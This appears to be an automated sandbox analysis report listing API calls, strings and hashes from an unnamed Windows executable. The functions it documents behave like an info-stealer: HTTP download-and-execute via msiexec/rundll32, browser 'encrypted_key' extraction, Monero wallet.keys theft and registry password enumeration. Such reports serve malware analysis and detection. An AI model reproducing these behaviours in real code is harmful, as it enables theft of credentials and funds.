                      • Opcode Fuzzy Hash: 39f3ce348de73e09cd7b5e0819815f67d12e43c96d2673afde11992b039fb5b9
                      • Instruction Fuzzy Hash: 0F41B17A94025867CB10F770DC47FED3338AB75700F4044A4B589661C2EFB49BC98B92
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001D906C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateGlobalStream
                      • String ID: image/jpeg
                      • API String ID: 2244384528-3785015651
                      • Opcode ID: be18e5f90ecb0e4f6af53a4f9e90bce9257f5d9acf907dba24284b2526c4eb0e
                      • Instruction ID: 254b9fa1824602b73afabc77f72379dbb87b8c8e613d3a5df276e79038bd2b9e
                      • Opcode Fuzzy Hash: be18e5f90ecb0e4f6af53a4f9e90bce9257f5d9acf907dba24284b2526c4eb0e
                      • Instruction Fuzzy Hash: 9471F9B5A10208ABDB04EFE4DD89FEEB7B8BF58300F108518F516A7290DB34E905CB65
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • ShellExecuteEx.SHELL32(0000003C), ref: 001D31C5
                      • ShellExecuteEx.SHELL32(0000003C), ref: 001D335D
                      • ShellExecuteEx.SHELL32(0000003C), ref: 001D34EA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExecuteShell$lstrcpy
                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                      • API String ID: 2507796910-3625054190
                      • Opcode ID: 311bde9e6e7f60ece6d0fea23f9dde12e4be1c49f7b6ac2414ed586481c757f4
                      • Instruction ID: a0018f5e7bf88ff4f94305a5ad43e1d39999ed3e620f65d2a5fd6b52a34daad8
                      • Opcode Fuzzy Hash: 311bde9e6e7f60ece6d0fea23f9dde12e4be1c49f7b6ac2414ed586481c757f4
                      • Instruction Fuzzy Hash: 831246718001589ADB09FBA0DCA2FDEB738AF34300F90416AF50676291EF742B4ACF56
                      APIs
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C6280: InternetOpenA.WININET(001E0DFE,00000001,00000000,00000000,00000000), ref: 001C62E1
                        • Part of subcall function 001C6280: StrCmpCA.SHLWAPI(?,00E3EA28), ref: 001C6303
                        • Part of subcall function 001C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C6335
                        • Part of subcall function 001C6280: HttpOpenRequestA.WININET(00000000,GET,?,00E3E3A0,00000000,00000000,00400100,00000000), ref: 001C6385
                        • Part of subcall function 001C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001C63BF
                        • Part of subcall function 001C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C63D1
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5318
                      • lstrlen.KERNEL32(00000000), ref: 001D532F
                        • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                      • StrStrA.SHLWAPI(00000000,00000000), ref: 001D5364
                      • lstrlen.KERNEL32(00000000), ref: 001D5383
                      • lstrlen.KERNEL32(00000000), ref: 001D53AE
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 3240024479-1526165396
                      • Opcode ID: 263a2fd94954516ed8bdca096b655b9b6a0a6e79db320d6a299a751e35e3502b
                      • Instruction ID: d0b6ce5beaa45ba40e8219f8886eaf0dec2d32dd74162bcce9619a732fac870b
                      • Opcode Fuzzy Hash: 263a2fd94954516ed8bdca096b655b9b6a0a6e79db320d6a299a751e35e3502b
                      • Instruction Fuzzy Hash: 74514430950148EBCB18FF64CD96EED7779AF20301F904019F8066B292EF34AB45DBA6
                      APIs
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                        • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                      • InternetOpenA.WININET(001E0DF7,00000001,00000000,00000000,00000000), ref: 001C610F
                      • StrCmpCA.SHLWAPI(?,00E3EA28), ref: 001C6147
                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 001C618F
                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001C61B3
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 001C61DC
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001C620A
                      • CloseHandle.KERNEL32(?,?,00000400), ref: 001C6249
                      • InternetCloseHandle.WININET(?), ref: 001C6253
                      • InternetCloseHandle.WININET(00000000), ref: 001C6260
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                      • String ID: (
                      • API String ID: 2507841554-2408637067
                      • Opcode ID: a8979e8117faafb21d48da2b541f69e72e5528f290d6e0858afda0feb8de30c1
                      • Instruction ID: f7bb18dd6ad4da4483ae7db160bab8219b40b6e7bcd9f6cbd505d300e665de7f
                      • Opcode Fuzzy Hash: a8979e8117faafb21d48da2b541f69e72e5528f290d6e0858afda0feb8de30c1
                      • Instruction Fuzzy Hash: 86516EB1900218ABDB20DF90DD45FEE77B8EF54701F1080A8A605A7180DB74AA85CF99
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen
                      • String ID:
                      • API String ID: 2001356338-0
                      • Opcode ID: 11b597036127829a338d5cce3ea08b6d3b4ed9d84b18160f45e1272c54825022
                      • Instruction ID: d15f8be040c511741f54015adffa0d635f4eec132bd5d1f1c30c2a22b1d65741
                      • Opcode Fuzzy Hash: 11b597036127829a338d5cce3ea08b6d3b4ed9d84b18160f45e1272c54825022
                      • Instruction Fuzzy Hash: 82C1B8B5940219ABCB14EF60DD89FEE7378BF64304F004599F50A67381EB70AA85CF95
                      APIs
                        • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 001D42EC
                      • lstrcat.KERNEL32(?,00E3DF68), ref: 001D430B
                      • lstrcat.KERNEL32(?,?), ref: 001D431F
                      • lstrcat.KERNEL32(?,00E3D0F0), ref: 001D4333
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001D8D90: GetFileAttributesA.KERNEL32(00000000,?,001C1B54,?,?,001E564C,?,?,001E0E1F), ref: 001D8D9F
                        • Part of subcall function 001C9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 001C9D39
                        • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                        • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                        • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                        • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                        • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                        • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                        • Part of subcall function 001D93C0: GlobalAlloc.KERNEL32(00000000,001D43DD,001D43DD), ref: 001D93D3
                      • StrStrA.SHLWAPI(?,00E3E0D0), ref: 001D43F3
                      • GlobalFree.KERNEL32(?), ref: 001D4512
                        • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9AEF
                        • Part of subcall function 001C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,001C4EEE,00000000,?), ref: 001C9B01
                        • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9B2A
                        • Part of subcall function 001C9AC0: LocalFree.KERNEL32(?,?,?,?,001C4EEE,00000000,?), ref: 001C9B3F
                      • lstrcat.KERNEL32(?,00000000), ref: 001D44A3
                      • StrCmpCA.SHLWAPI(?,001E08D1), ref: 001D44C0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 001D44D2
                      • lstrcat.KERNEL32(00000000,?), ref: 001D44E5
                      • lstrcat.KERNEL32(00000000,001E0FB8), ref: 001D44F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                      • String ID:
                      • API String ID: 3541710228-0
                      • Opcode ID: 743f238b23dcdafc764a2a9ce5fa4f08c18c431525f21cfe7faa0dda00a6c834
                      • Instruction ID: 69fda7a01610cc7d3d1a7e2854bc4da5a0b740ac7491de670ab64febed19215f
                      • Opcode Fuzzy Hash: 743f238b23dcdafc764a2a9ce5fa4f08c18c431525f21cfe7faa0dda00a6c834
                      • Instruction Fuzzy Hash: A67166B6900218ABCB14FBA0DC99FEE7379AF98300F008599F605A7181EB75DB55CF91
                      APIs
                        • Part of subcall function 001C12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C12B4
                        • Part of subcall function 001C12A0: RtlAllocateHeap.NTDLL(00000000), ref: 001C12BB
                        • Part of subcall function 001C12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001C12D7
                        • Part of subcall function 001C12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001C12F5
                        • Part of subcall function 001C12A0: RegCloseKey.ADVAPI32(?), ref: 001C12FF
                      • lstrcat.KERNEL32(?,00000000), ref: 001C134F
                      • lstrlen.KERNEL32(?), ref: 001C135C
                      • lstrcat.KERNEL32(?,.keys), ref: 001C1377
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,00E3A280,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 001C1465
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                        • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                        • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                        • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                        • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                        • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                      • DeleteFileA.KERNEL32(00000000), ref: 001C14EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                      • API String ID: 3478931302-218353709
                      • Opcode ID: 83da66559a7cfb189cb7e804e90705af649cecf02309f7a8c29ad8286d0668b4
                      • Instruction ID: 808c0fcb0b31fdd8df6f84fb5ad587b7cd3fe4b345a67b0c2c82b1b44888b829
                      • Opcode Fuzzy Hash: 83da66559a7cfb189cb7e804e90705af649cecf02309f7a8c29ad8286d0668b4
                      • Instruction Fuzzy Hash: CE5157B1D5015957CB15FB60DD92FED737CAF64300F8041A9B60A62182EF706B85CFA6
                      APIs
                        • Part of subcall function 001C72D0: memset.MSVCRT ref: 001C7314
                        • Part of subcall function 001C72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 001C733A
                        • Part of subcall function 001C72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001C73B1
                        • Part of subcall function 001C72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 001C740D
                        • Part of subcall function 001C72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 001C7452
                        • Part of subcall function 001C72D0: HeapFree.KERNEL32(00000000), ref: 001C7459
                      • lstrcat.KERNEL32(00000000,001E17FC), ref: 001C7606
                      • lstrcat.KERNEL32(00000000,00000000), ref: 001C7648
                      • lstrcat.KERNEL32(00000000, : ), ref: 001C765A
                      • lstrcat.KERNEL32(00000000,00000000), ref: 001C768F
                      • lstrcat.KERNEL32(00000000,001E1804), ref: 001C76A0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 001C76D3
                      • lstrcat.KERNEL32(00000000,001E1808), ref: 001C76ED
                      • task.LIBCPMTD ref: 001C76FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                      • String ID: :
                      • API String ID: 3191641157-3653984579
                      • Opcode ID: 8f9657cf2b4a50c3923ae7150a60a7ab076db5d197b41ff9cf51312a4ef105d7
                      • Instruction ID: 8e2cea0fe2f44280483a916a627d2a918bc0b9fa1eded31960ce1b7a6471ee4b
                      • Opcode Fuzzy Hash: 8f9657cf2b4a50c3923ae7150a60a7ab076db5d197b41ff9cf51312a4ef105d7
                      • Instruction Fuzzy Hash: 87316E72900209EFCB08EBB5DD85EFE73B8BB64301B144528F102B7290DB34E956CB55
                      APIs
                      • memset.MSVCRT ref: 001C7314
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 001C733A
                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001C73B1
                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 001C740D
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 001C7452
                      • HeapFree.KERNEL32(00000000), ref: 001C7459
                      • task.LIBCPMTD ref: 001C7555
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
